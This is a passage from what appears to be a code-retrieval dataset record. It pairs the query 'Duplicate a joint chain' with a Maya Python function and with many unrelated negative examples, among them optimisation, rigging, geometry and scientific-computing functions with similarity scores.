for (u,v) in edges:\n if (u,v) == (s_2, t_1):\n m.addConstr(z_e[u,v] >= 1)\n elif u == s_2:\n m.addConstr(z_v[v] + z_e[u,v] >= 1)\n elif v == t_1:\n m.addConstr(-z_v[u] + z_e[u,v] >= 0)\n else:\n m.addConstr(z_v[v] - z_v[u] + z_e[u,v] >= 0)\n\n # 4. Constraints for e[u,v] >= max(x_e[u,v], y_e[u,v], z_e[u,v])\n for (u,v) in edges:\n m.addConstr(e[u,v] >= x_e[u,v])\n m.addConstr(e[u,v] >= y_e[u,v])\n m.addConstr(e[u,v] >= z_e[u,v])\n\n m.optimize()\n\n if m.status == GRB.status.OPTIMAL:\n print \"Min GNS cut value = \" + str(m.objVal)\n print \"GNS cut edges:\"\n\n for u,v in edges:\n if e[u,v].x != 0:\n print (u,v)\n print \"s1-t1 cut edges in GNS:\"\n for u,v in edges:\n if x_e[u,v].x != 0:\n print (u,v)\n\n print \"s2-t2 cut edges in GNS:\"\n for u,v in edges:\n if y_e[u,v].x != 0:\n print (u,v)\n\n print \"s2-t1 cut edges in GNS:\"\n for u,v in edges:\n if z_e[u,v].x != 0:\n print (u,v)\n else:\n # something went wrong...err...\n print \"Something was wrong\"\n\n except GurobiError:\n print ('Error report from Gurobi')", "def build_guide(self, **kwargs):\n\n # This builds your guide master and updates your options\n self.create_guide_master(**kwargs)\n\n prefix = self.prefix # Naming prefix. Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n mc.setAttr(self.guide_master+'.offsetTranslateY', -0.2)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n mirror_values = [1, -1]\n enable_steering = options.get('enableSteering')\n\n colors = ['green', 'red']\n\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n color = colors[mi]\n\n l_main_zero, l_main_plc = self.guide_joint('main', alt_prefix=prefix, placer_only=1)\n\n # create hub\n hub_zero, hub_plc, hub_jnt = self.guide_joint('wheelhub', alt_prefix=prefix, constraint_type='point')\n hub_end_zero, hub_end_plc, hub_end_jnt = self.guide_joint('wheelhub_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(hub_end_zero, r=1, t=[1,0,0])\n mc.parent(hub_end_jnt, hub_jnt)\n mc.aimConstraint(hub_end_plc, hub_jnt, aim=[mirror_value,0,0], u=[0,1,0], wu=[0,1,0], wut='vector')\n mc.parentConstraint(hub_plc, hub_end_zero , mo=1)\n\n # Create steering arm\n steer_zero, steer_plc, steer_jnt = self.guide_joint('steeringArm', alt_prefix=prefix, constraint_type='parent')\n mc.xform(steer_zero, r=1, t=[-1,0,0])\n mc.parent(hub_jnt, steer_jnt)\n\n # Create shocks\n shock_a_zero, shock_a_plc, shock_a_jnt = self.guide_joint('shock_A', alt_prefix=prefix, constraint_type='point')\n shock_b_zero, shock_b_plc, shock_b_jnt = self.guide_joint('shock_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(shock_a_zero, ws=1, t=[-2,2,0])\n mc.xform(shock_b_zero, ws=1, t=[-0.5,0.25,0])\n\n mc.parent(shock_b_jnt, shock_a_jnt)\n\n mc.aimConstraint(shock_b_plc, shock_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n mc.aimConstraint(shock_a_plc, shock_b_jnt, aim=[-mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # upper arm\n up_arm_zero, up_arm_plc, up_arm_jnt = self.guide_joint('upperArm', alt_prefix=prefix, constraint_type='point')\n up_arm_end_zero, up_arm_end_plc, up_arm_end_jnt = self.guide_joint('upperArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(up_arm_end_zero, r=1, t=[-3.5,1,0])\n mc.xform(up_arm_zero, r=1, t=[-1,0.5,0])\n mc.parent(up_arm_end_jnt, up_arm_jnt)\n mc.aimConstraint(up_arm_end_plc, up_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=up_arm_plc)\n\n # lower arm\n lo_arm_zero, lo_arm_plc, lo_arm_jnt = self.guide_joint('lowerArm', alt_prefix=prefix, constraint_type='point')\n lo_arm_end_zero, lo_arm_end_plc, lo_arm_end_jnt = self.guide_joint('lowerArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(lo_arm_end_zero, r=1, t=[-4,-0.5,0])\n mc.xform(lo_arm_zero, r=1, t=[-1,-0.5,0])\n mc.parent(lo_arm_end_jnt, lo_arm_jnt)\n mc.aimConstraint(lo_arm_end_plc, lo_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=lo_arm_plc)\n\n # steeringArm\n if enable_steering:\n steeringArm_a_zero, steeringArm_a_plc, steeringArm_a_jnt = self.guide_joint('steeringArm_A', alt_prefix=prefix, constraint_type='point')\n steeringArm_b_zero, steeringArm_b_plc, steeringArm_b_jnt = self.guide_joint('steeringArm_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(steeringArm_b_zero, r=1, t=[-1.5,0,1])\n mc.xform(steeringArm_a_zero, r=1, t=[-4,0,1])\n\n mc.parent(steeringArm_b_jnt, steeringArm_a_jnt)\n mc.aimConstraint(steeringArm_b_plc, steeringArm_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # Create control\n zero, ctrl = self.guide_ctrl('wheel', alt_prefix=prefix, driver=hub_end_jnt, color=color, shape='circle', axis='X', scale=[3]*3, create_pivot=0)\n mc.setAttr(ctrl+'.numOffsetCtrls', 1)\n mc.addAttr(ctrl+'.numOffsetCtrls', e=1, min=1)\n mc.xform(ctrl.replace('_CTL','_A_OFF_CTL.cv[*]'), r=1, s=[0.8]*3)\n\n control.create_shape('wheel', ctrl, axis='X', scale=[3]*3)\n\n #suspension_zero, suspension_ctrl = self.guide_ctrl('suspension', create_pivot=0, driver=shock_a_jnt, axis='X', shape='pyramid', color=color, scale=[1.5,1,1], alt_prefix=prefix)\n ground_zero, ground_ctrl = self.guide_ctrl('ground', create_pivot=0, shape='square', color='grass', alt_prefix=prefix)\n mc.delete(mc.pointConstraint(hub_jnt, ground_zero))\n\n # constraint to placer\n childs = [prefix+'_wheelhub_JNT_PLC_ZERO',\n prefix+'_steeringArm_JNT_PLC_ZERO',\n prefix+'_shock_A_JNT_PLC_ZERO',\n prefix+'_shock_B_JNT_PLC_ZERO',\n prefix+'_upperArm_JNT_PLC_ZERO',\n prefix+'_upperArm_end_JNT_PLC_ZERO',\n prefix+'_lowerArm_JNT_PLC_ZERO',\n prefix+'_lowerArm_end_JNT_PLC_ZERO']\n\n for c in childs:\n mc.parentConstraint(l_main_plc, c, mo=1)\n\n mc.setAttr(l_main_plc+'.offsetTranslateY', mirror_value*0.5)\n\n # ################3\n # Place it all\n hub_pos = mc.ls(options.get('hubCenter') or '')\n if hub_pos:\n loc = utils.snap_locator(hub_pos)\n mc.delete(mc.pointConstraint(loc, self.guide_master))\n mc.setAttr(self.guide_master+'.tx', 0)\n mc.delete(mc.pointConstraint(loc, l_main_plc), loc)\n\n hub_end_pos = mc.ls(options.get('hubEndCenter') or '')\n if hub_end_pos:\n loc = utils.snap_locator(hub_end_pos)\n mc.delete(mc.pointConstraint(loc, hub_end_plc), loc)\n\n else:\n mc.xform(self.guide_master, ws=1, t=[0,2,10])\n mc.xform(l_main_plc, r=1, t=[mirror_value*6,0,0])\n\n mc.setAttr(self.guide_master+'.jointAxisVis', 1)\n\n l = utils.snap_locator(hub_jnt)\n mc.setAttr(l+'.ty', 0)\n mc.delete(mc.pointConstraint(l, ground_zero), l)\n\n chassis_plc_zero, chassis_plc = self.guide_joint('chassis_driver', placer_only=1)\n mc.setAttr(chassis_plc+'.radius', 1)\n mc.setAttr(chassis_plc+'.color', 0.96, 0.71, .01)\n mc.setAttr(chassis_plc+'.otherType', 'Leg IK Driver', type='string');\n mc.setAttr(chassis_plc+'.type', 18)\n\n mc.pointConstraint(l_prefix+'_lowerArm_end_JNT_PLC', r_prefix+'_lowerArm_end_JNT_PLC', chassis_plc_zero)\n utils.set_attrs(chassis_plc, l=1, k=0)\n\n # This finalizes your guide.\n self.finalize_guide()\n self.mirror_guide()", "def sf_bound(l0, l2, lmbdas, bidual, r, rank=False):\n\n xvals, bnd = [], []\n if l0 == \"constr\":\n offset = 2\n if rank == False:\n bnd_label = r\"$p^{\\ast \\ast}(k + r + 2)$\"\n else:\n bnd_label = r\"$p^{\\ast \\ast}(k + r + 2) - \\zeta_r$\"\n\n for l in lmbdas:\n # if l - r - offset > 0:\n # xvals.append(l)\n # bnd.append(bidual[l-r-offset])\n if l + r + offset < lmbdas[-1]:\n bnd.append(bidual[l + r + offset])\n else:\n bnd.append(bidual[-1])\n\n xvals = lmbdas\n\n elif l0 == \"pen\":\n offset = 1\n if rank == False:\n bnd_label = r\"$p^{\\ast \\ast}(\\lambda) + \\lambda(r + 1)$\"\n else:\n bnd_label = r\"$p^{\\ast \\ast}(\\lambda) + \\lambda(r + 1) + \\zeta$\"\n\n if rank == False:\n bnd = [bd + l * (r + offset) for bd, l in zip(bidual, lmbdas)]\n else:\n # this is very confusing, but the code is set up such that the 3rd\n # argument (lmbdas) is the one that varies, in this case we are\n # letting the rank vary from 1,m so we artifically let lmbdas\n # bet this and set r to be the value of l0 penalty\n\n bnd = [bd + r * (l + offset) for bd, l in zip(bidual, lmbdas)]\n\n xvals = lmbdas\n\n return xvals, bnd, bnd_label", "def build_stairs(self, pos1, pos2, height, extendend = False):\n raise NotImplementedError", "def final_check(points):\n for p in points:\n constraints = p.constraints\n if len(p.lies_on) == 1:\n if [x for x in p.lies_on][0].symify() is not None:\n p.x, p.y = [x for x in p.lies_on][0].arbitrary_point()\n return p\n else:\n return None\n elif len(p.lies_on) > 1:\n symified_constraints = []\n # Get all of the constraints that we have processed and given\n # locations to\n for x in p.lies_on:\n tmp = x.symify()\n if tmp is not None:\n symified_constraints.append(tmp)\n # Ensure that we have at least two constraints\n # (to define an intersection); if not go to the next point\n if len(symified_constraints) >= 2:\n # Compute the intersection\n intersection = sympy.intersection(*symified_constraints)\n if intersection:\n p.x = float(intersection[0].x)\n p.y = float(intersection[0].y)\n return p\n else:\n return None\n\n if all([type(c) == primitives.Line for c in constraints]):\n p.x = random.uniform(-1, 1)\n p.y = random.uniform(-1, 1)\n return p\n elif [type(c) for c in constraints].count(primitives.Circle) == 1:\n for c in constraints:\n if type(c) == primitives.Circle:\n circle = c\n break\n if circle.symify() is not None:\n p.x, p.y = circle.arbitrary_point()\n return p\n return None", "def test_4():\n h = iotbx.pdb.input(source_info=None, lines=test_pdb_4).construct_hierarchy()\n asc = h.atom_selection_cache()\n ncs_inp = iotbx.ncs.input(\n hierarchy=h,\n params=ncs_pars.ncs_search)\n ncs_groups = ncs_inp.get_ncs_restraints_group_list()\n assert len(ncs_groups) == 1\n # group 1\n assert ncs_groups[0].master_iselection.all_eq(\n asc.selection(string = \"chain A\").iselection())\n g1_c = ncs_groups[0].copies\n assert len(g1_c)==1\n assert g1_c[0].iselection.all_eq(\n asc.selection(string = \"chain B\").iselection())", "def __addValueConstraints(self):\n for x in range(self.width):\n for y in range(self.height):\n g = self.grid[(x, y)]\n self.solver.add(\n Or([g == Magnets.EMPTY, g == Magnets.PLUS, g == Magnets.MINUS]))\n if x > 0:\n left = self.grid[(x-1, y)]\n self.solver.add(Or([g != left, g == Magnets.EMPTY]))\n if y > 0:\n up = self.grid[(x, y-1)]\n self.solver.add(Or([g != up, g == Magnets.EMPTY]))", "def __init__(self, ftrTail, strConstraint, ftrHead):\n # the tail feature of the constraint is the \"left side\" of the constraint\n # (i.e., tail < head for the \"less than\" constraint\n self.tail = ftrTail\n # the head feature of the constraint is the \"right side\" of the constraint\n # (i.e., tail < head for the \"less than\" constraint\n self.head = ftrHead\n # store the constraint\n self.constraint = strConstraint", "def rxn_to_constraints_samples_v2(player_list, action_list, samps):\n allele_rxns_constraint_dict = {}\n for all_player in player_list:\n allele_rxns_constraint_dict[all_player] = {}\n for react in all_player.cobra_reactions.keys():\n allele_rxns_constraint_dict[all_player][react] = {}\n max_flux, min_flux = max(samps[react]), min(samps[react])\n mean_flux = np.mean(samps[react])\n \n action_to_constraints_dict = {}\n # for reactions that can't have any change, keep their bounds at a single value.\n if max_flux == min_flux: \n for a in action_list:\n action_to_constraints_dict.update({a: max_flux})\n else:\n left_bound_distance = mean_flux - min_flux\n\n gradient_steps = int(len(action_list)/2)\n # min_to_mean_grad = np.arange(min_flux, mean_flux, (mean_flux-min_flux)/gradient_steps)\n # max_to_mean_grad = np.arange(mean_flux, max_flux, (max_flux-mean_flux)/gradient_steps)\n min_to_mean_grad = np.arange(min_flux, mean_flux, (mean_flux-min_flux)/(gradient_steps+1))[-gradient_steps:]\n max_to_mean_grad = np.arange(mean_flux, max_flux, (max_flux-mean_flux)/(gradient_steps+1))[-gradient_steps:]\n\n for a in action_list:\n if a == \"no_change\":\n action_to_constraints_dict.update({a: 0})\n else:\n dec_or_inc = a.split(\"_\")[0]\n grad_dist = int(a.split(\"_\")[1])\n\n # It doesn't matter if mean_flux is less than or greater than 0.\n\n if dec_or_inc == \"lb\": # Change upper_bound\n action_to_constraints_dict.update({a: min_to_mean_grad[grad_dist]})\n elif dec_or_inc == \"ub\": # Change lower_bound\n action_to_constraints_dict.update({a: max_to_mean_grad[grad_dist]})\n allele_rxns_constraint_dict[all_player][react].update(action_to_constraints_dict)\n \n return allele_rxns_constraint_dict", "def calcBasis2(xpts,basis_size,R):\n out = np.zeros((len(xpts),basis_size))\n for n in range(1,basis_size+1):\n out[:,n-1] = n*spherical_jn(0,n*np.pi*xpts/R)\n # Alturnatively\n #out[:,n-1] = (R/xpts)*np.sin(n*np.pi*xpts/R)\n return out", "def make_hollow(\n self,\n p1: Vec,\n p2: Vec,\n thick: float = 16,\n mat: str = 'tools/toolsnodraw',\n inner_mat: str = '',\n ) -> List['Solid']:\n if not inner_mat:\n inner_mat = mat\n b_min, b_max = Vec.bbox(p1, p2)\n\n top = self.make_prism(\n Vec(b_min.x, b_min.y, b_max.z),\n Vec(b_max.x, b_max.y, b_max.z + thick),\n mat,\n )\n\n bottom = self.make_prism(\n Vec(b_min.x, b_min.y, b_min.z),\n Vec(b_max.x, b_max.y, b_min.z - thick),\n mat,\n )\n\n west = self.make_prism(\n Vec(b_min.x - thick, b_min.y, b_min.z),\n Vec(b_min.x, b_max.y, b_max.z),\n mat,\n )\n\n east = self.make_prism(\n Vec(b_max.x, b_min.y, b_min.z),\n Vec(b_max.x + thick, b_max.y, b_max.z),\n mat\n )\n\n north = self.make_prism(\n Vec(b_min.x, b_max.y, b_min.z),\n Vec(b_max.x, b_max.y + thick, b_max.z),\n mat,\n )\n\n south = self.make_prism(\n Vec(b_min.x, b_min.y - thick, b_min.z),\n Vec(b_max.x, b_min.y, b_max.z),\n mat,\n )\n\n top.bottom.mat = bottom.top.mat = inner_mat\n east.west.mat = west.east.mat = inner_mat\n north.south.mat = south.north.mat = inner_mat\n\n return [\n north.solid, south.solid,\n east.solid, west.solid,\n top.solid, bottom.solid,\n ]", "def synthesize_specs(self, wl, p_abs_coeff, n_abs_coeff, p_ratio, thickness):\n \n syn_abs = ((p_ratio * p_abs_coeff) + ((1-p_ratio) * n_abs_coeff)) * (thickness * 1e-7)\n \n return wl, syn_abs", "def __init__(self, model, line, line_ht, segments = None, influence = None, \r\n connectivity = 1, connectivity_normdist = None,\r\n variables = [], priors=[]):\r\n\r\n import numpy as np\r\n from scipy.interpolate import interp1d\r\n import copy\r\n \r\n # Connect this element to the solver\r\n self.model = model\r\n model.elementlist.append(self)\r\n model.linear_solver = True\r\n \r\n # Prepare the stochastic variables\r\n self.variables = variables\r\n self.priors = priors\r\n \r\n # Initialize the head target and connectivity variables\r\n self.line_ht = line_ht\r\n self.connectivity = connectivity\r\n if np.isscalar(self.connectivity): # Connectivity provided is uniform\r\n \r\n self.connectivity_uniform = True\r\n \r\n else: # Connectivity provided \r\n \r\n self.connectivity_uniform = False\r\n \r\n # Check if normalized distances were provided\r\n if connectivity_normdist is None:\r\n raise Exception('If connectivity is not uniform, a vector of equal length containing normalized distances (e.g., [0., 0.25, 0.6, 1.]) must be specified.')\r\n \r\n # Check if connectivity_normdist is valid\r\n if np.min(connectivity_normdist) < 0 or np.max(connectivity_normdist) > 1:\r\n raise Exception('connectivity_normdist values must be between 0 and 1. Current values: '+str(connectivity_normdist))\r\n \r\n # Check if connectivity_normdist is sorted\r\n if not (connectivity_normdist == np.sort(connectivity_normdist)).all():\r\n raise Exception('connectivity_normdist values must be provided in ascending order. Current values: '+str(connectivity_normdist))\r\n \r\n self.connectivity_normdist = connectivity_normdist\r\n \r\n # ---------------------------------------------------------------------\r\n # Subdivide the provided no flow boundary into #segments pieces\r\n \r\n # Complexify the line, if it wasn't already complex\r\n line = self.complexify(line)\r\n \r\n # The subdivision algorith requires the line coordinates as a real N-by-2 matrix\r\n line = np.column_stack((\r\n np.real(line)[:,np.newaxis],\r\n np.imag(line)[:,np.newaxis]))\r\n \r\n # Make a copy of the line\r\n self.line_raw = copy.copy(line)\r\n \r\n # Check if a subdivision has been specified\r\n if segments is None: # No subdivision required\r\n self.segments = line.shape[0]-1\r\n else: # Otherwise, set target\r\n self.segments = segments\r\n \r\n # A number of consistency checks\r\n if self.segments < self.line_raw.shape[0]-1:\r\n raise Exception('Number of segments '+str(self.segments)+\" mustn't be smaller than number of line points \"+str(line.shape[0])+'.')\r\n if len(line_ht) != line.shape[0]:\r\n raise Exception('Number of head prescriptions must equal number of vertices: '+str(len(line_ht))+' =/= '+str(line.shape[0]))\r\n \r\n \r\n if self.segments > self.line_raw.shape[0]:\r\n \r\n # Subdivide the line\r\n self.line = self.subdivide_line(np.column_stack((line,self.line_ht)),self.segments)\r\n self.line_c = copy.copy(self.line[:,0] + 1j*self.line[:,1])\r\n self.line_ht = copy.copy(self.line[:,2])\r\n \r\n else:\r\n \r\n # Otherwise, reconstruct the line format\r\n self.line = self.line_raw.copy()\r\n self.line_c = self.line[:,0] + 1j*self.line[:,1]\r\n self.line_ht = line_ht\r\n \r\n # --------------------------------------------------------------------- \r\n \r\n # Assign the initial strength variables for each segment\r\n self.strength = np.ones(self.segments)\r\n \r\n # Prepare the influence range for this line sink\r\n if influence is None:\r\n # If no influence range is specified, set it to twice the domain radius\r\n # to ensure that no point in the model domain will lie outside this range\r\n self.influence = self.model.domain_radius*2\r\n else:\r\n self.influence = influence\r\n \r\n # Prepare a few variables for this element\r\n self.L = [] # Length of each line segment\r\n self.zc = [] # Center of each line segment\r\n self.head_target = [] # Head target at each line segment\r\n \r\n for seg in range(self.segments):\r\n \r\n self.L += [np.abs(self.line_c[seg+1] - self.line_c[seg])]\r\n self.zc += [(self.line_c[seg]+self.line_c[seg+1])/2]\r\n self.head_target += [(self.line_ht[seg]+self.line_ht[seg+1])/2]\r\n \r\n # Convert list of segment centers to array\r\n self.zc = np.asarray(self.zc)\r\n self.head_target = np.asarray(self.head_target)\r\n \r\n # Now form a vector of cumulative distances\r\n self.cumdist = []\r\n for seg in range(self.segments):\r\n if seg == 0:\r\n self.cumdist.append(np.abs(self.zc[0]-self.line_c[0]))\r\n else:\r\n self.cumdist.append(np.abs(self.zc[seg]-self.zc[seg-1]))\r\n self.cumdist = np.cumsum(np.asarray(self.cumdist))\r\n self.cumdist /= (self.cumdist[-1] + np.abs(self.zc[-1]-self.line_c[-1]))\r\n \r\n if not self.connectivity_uniform:\r\n \r\n # Interpolate the connectivity\r\n from scipy.interpolate import interp1d\r\n itp = interp1d(self.connectivity_normdist,self.connectivity)\r\n self.connectivity_interpolated = itp(self.cumdist)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n # Convert the head targets to potential targets\r\n self.set_potential_target()\r\n \r\n # Check if the prior matches the number of parameters\r\n if len(self.priors) != len(self.variables):\r\n raise Exception('Number of priors must match number of unknown variables. Number of priors: '+str(self.priors)+' / Number of unknown variables: '+str(len(self.variables)))\r\n \r\n # Go through all elements\r\n if len(self.variables) > 0:\r\n # There are some model variables specified\r\n for idx,var in enumerate(self.variables):\r\n self.model.num_params += 1\r\n exec(\"self.model.params += [self.%s]\" % var)\r\n self.model.priors += [self.priors[idx]]\r\n self.model.variables += [var]\r\n if 'name' in list(self.priors[idx].keys()):\r\n self.model.param_names += [self.priors[idx]['name']] \r\n else: \r\n self.model.param_names += ['unknown']", "def form_waypoints_polytraj(waypoints,n_der):\n\n for key in waypoints.keys():\n\n if waypoints[key] is not None:\n wayp_shape = np.shape(waypoints[key])\n if np.size(wayp_shape)==0:\n wayp = np.reshape(waypoints[key],(1,1))\n col = 1\n row = 1\n elif np.size(wayp_shape)==1:\n wayp = np.reshape(waypoints[key],(1,wayp_shape[0]))\n col = wayp_shape[0]\n row = 1\n else:\n row = wayp_shape[0]\n col = wayp_shape[1]\n wayp = waypoints[key]\n if row < n_der[key]:\n waypoints[key] = np.append(wayp,\n [[0.0] * col] * (n_der[key] - row), axis=0)\n return waypoints", "def structure_factor(trj, Q_range=(0.5, 50), n_points=1000, framewise_rdf=False, weighting_factor='fz'):\n if weighting_factor not in ['fz']:\n raise ValueError('Invalid weighting_factor `{}` is given.'\n ' The only weighting_factor currently supported is `fz`.'.format(\n weighting_factor))\n\n rho = np.mean(trj.n_atoms / trj.unitcell_volumes)\n L = np.min(trj.unitcell_lengths)\n\n top = trj.topology\n elements = set([a.element for a in top.atoms])\n\n compositions = dict()\n form_factors = dict()\n rdfs = dict()\n\n Q = np.logspace(np.log10(Q_range[0]),\n np.log10(Q_range[1]),\n num=n_points)\n S = np.zeros(shape=(len(Q)))\n\n for elem in elements:\n compositions[elem.symbol] = len(top.select('element {}'.format(elem.symbol)))/trj.n_atoms\n form_factors[elem.symbol] = elem.atomic_number\n\n for i, q in enumerate(Q):\n num = 0\n denom = 0\n\n for elem in elements:\n denom += compositions[elem.symbol] * form_factors[elem.symbol]\n\n for (elem1, elem2) in it.product(elements, repeat=2):\n e1 = elem1.symbol\n e2 = elem2.symbol\n\n f_a = form_factors[e1]\n f_b = form_factors[e2]\n\n x_a = compositions[e1]\n x_b = compositions[e2]\n \n try:\n g_r = rdfs['{0}{1}'.format(e1, e2)]\n except KeyError:\n pairs = top.select_pairs(selection1='element {}'.format(e1),\n selection2='element {}'.format(e2))\n if framewise_rdf:\n r, g_r = rdf_by_frame(trj,\n pairs=pairs,\n r_range=(0, L / 2),\n bin_width=0.001)\n else:\n r, g_r = md.compute_rdf(trj,\n pairs=pairs,\n r_range=(0, L / 2),\n bin_width=0.001)\n rdfs['{0}{1}'.format(e1, e2)] = g_r\n integral = simps(r ** 2 * (g_r - 1) * np.sin(q * r) / (q * r), r)\n\n if weighting_factor == 'fz':\n pre_factor = 4 * np.pi * rho\n partial_sq = (integral*pre_factor) + 1\n num += (x_a*f_a*x_b*f_b) * (partial_sq)\n S[i] = (num/(denom**2))\n return Q, S" ]
[ "0.60946095", "0.5763195", "0.5703657", "0.5553354", "0.5487165", "0.5435914", "0.53954494", "0.51878697", "0.51259", "0.51116204", "0.5077191", "0.5054225", "0.4999024", "0.49555075", "0.49334964", "0.4926704", "0.4873679", "0.48712805", "0.48634586", "0.48509604", "0.48481923", "0.48029104", "0.47769222", "0.47725466", "0.47688386", "0.47648177", "0.47571298", "0.47539604", "0.47416186", "0.47258055", "0.47168317", "0.47127858", "0.46833634", "0.4679966", "0.4672645", "0.46492857", "0.4645094", "0.46390012", "0.46266085", "0.46191394", "0.4612809", "0.45854715", "0.45830548", "0.45613867", "0.4558685", "0.45523793", "0.4549626", "0.4532902", "0.4530924", "0.45197472", "0.45159602", "0.4507721", "0.45042852", "0.4503898", "0.4500609", "0.44953385", "0.449238", "0.44912434", "0.44895926", "0.4487377", "0.4482088", "0.44805002", "0.44780904", "0.44764683", "0.4476091", "0.44744512", "0.44735107", "0.44706124", "0.4466808", "0.44664568", "0.4461734", "0.44595557", "0.444545", "0.44414255", "0.44397676", "0.44361046", "0.44350293", "0.44328895", "0.44301182", "0.44286665", "0.44208854", "0.44163248", "0.4413904", "0.44138137", "0.44131628", "0.44121096", "0.4408477", "0.44076893", "0.4405717", "0.4403596", "0.4397157", "0.43971512", "0.439351", "0.43928206", "0.43898267", "0.43828171", "0.43804172", "0.43801415", "0.43707323", "0.4368056" ]
0.66719025
0
Duplicate a joint chain.
def duplicate_chain(chain, search='', replace='', suffix=''): if suffix: suffix = '_'+suffix new_jnts = [] for joint in chain: new_name = joint.replace(search, replace, 1)+suffix new_jnt = mc.duplicate(joint, po=1, n=new_name)[0] if new_jnts: mc.parent(new_jnt, new_jnts[-1]) new_jnts.append(new_jnt) return new_jnts
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def skeleton_buildDuplicateChain(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = None, singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in ml_source],po=True,ic=True,rc=True)\n \n ml_joints = cgmMeta.validateObjListArg(l_joints,'cgmObject',setClass=True)\n \n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n \n if cgmType is False:\n ATTR.delete(mJnt.mNode,'cgmType')\n elif cgmType:\n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n mJnt.connectChildNode(ml_source[i].mNode,'sourceJoint',\"{0}Joint\".format(connectToSource))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n log.debug(ml_joints)\n return ml_joints", "def skeleton_duplicateJoint(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = 'skinJoint', singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in ml_source],po=True,ic=True,rc=True)\n \n ml_joints = [cgmMeta.cgmObject(j) for j in l_joints]\n\n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n if cgmType is not None:\n #l_names[i]['cgmType'] = cgmType \n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n mJnt.connectChildNode(ml_joints[i].mNode,connectToSource,'{0}Joint'.format(modifier))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n 